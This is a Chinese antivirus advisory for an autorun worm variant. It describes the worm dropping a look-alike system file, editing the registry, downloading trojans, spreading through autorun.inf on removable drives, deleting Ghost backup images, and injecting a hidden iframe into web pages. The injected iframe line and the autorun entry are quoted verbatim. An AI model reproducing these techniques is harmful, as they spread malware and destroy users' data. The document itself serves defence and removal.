“ 自动运行变种IPG”病毒技术细节
|
源代码网整理以下危险等级:★★★ 源代码网整理以下感染的操作系统:Windows XP, Windows NT, Windows Server 2003, Windows 2000 源代码网整理以下威胁情况: 源代码网整理以下传播级别:中 源代码网整理以下全球化传播态势:低 源代码网整理以下清除难度:困难 源代码网整理以下破坏力:高 源代码网整理以下破坏手段:感染,下载,传播 源代码网整理以下这是一个蠕虫病毒,用nspack加壳程序进行保护。 源代码网整理以下 病毒会利用CreateMutex创建一个"baby"的互斥,保证系统中只有一个实例在运行,如这个互斥已经存在,则病毒直接退出。 源代码网整理以下 1、该病毒运行后,驻留内存,释放文件到%Systemroot%system32目录下名为:crsss.exe,并删除自身,释放的文件名和系统csrss.exe文件名及其相似,以此来迷惑用户。 源代码网整理以下 2、修改如下注册表项: 源代码网整理以下(2)HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced 源代码网整理以下(3)HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain 源代码网整理以下(4)HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage 的值为00000001 ,修改IE主页属性使按钮失效,用户无法更改"主页"栏。 源代码网整理以下(5)HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate下面增加 源代码网整理以下 3、下载http://aaa.xxxxxx.cn/htm/up1.txt,http://aaa.xxxxxx.cn/down/up2.txt到系统文件夹,然后读取up1.txt和up2.txt的内容(up1.txt和up2.txt的内容为下载木马的网址链接),并把下载的木马到系统文件夹,命名为:temp.exe。 源代码网整理以下 4、病毒遍历本地所有存储设备,向可移动存储设备中,写入病毒本身niu.exe和autorun.inf.其中autorun.inf的内容为:: 源代码网整理以下open=niu.exe 源代码网整理以下 5、每5000毫秒为周期访问系统可用的磁盘,如发现niu.exe和Autorun.inf不在则重写。 源代码网整理以下 6、遍历磁盘,如果找到有*.GHO为后缀名的文件则删除,从而导致用户无法恢复系统(.GHO文件为系统还原工具GHOST的映像文件) 源代码网整理以下 7、遍历磁盘,查找index.php、*.htm、default.php、conn.asp等网页文件,插入一段JS代码: <IfrAmE src=http://aaa.xxxxxx.cn/ceshi.htm width=0 height=0></IfrAmE>,完成网页挂马。 源代码网整理以下安全建议: 源代码网整理以下 1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。 源代码网整理以下 2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。 源代码网整理以下 3 不浏览不良网站,不随意下载安装可疑插件。 源代码网整理以下 4 不接收QQ、MSN、Emial等传来的可疑文件。 源代码网整理以下 5 上网时打开杀毒软件实时监控功能。 源代码网整理以下 6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。 源代码网整理以下清除办法: 源代码网整理以下 瑞星杀毒软件清除办法: 源代码网整理以下 安装瑞星杀毒软件,升级到19.42.20版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。 源代码网供稿. |
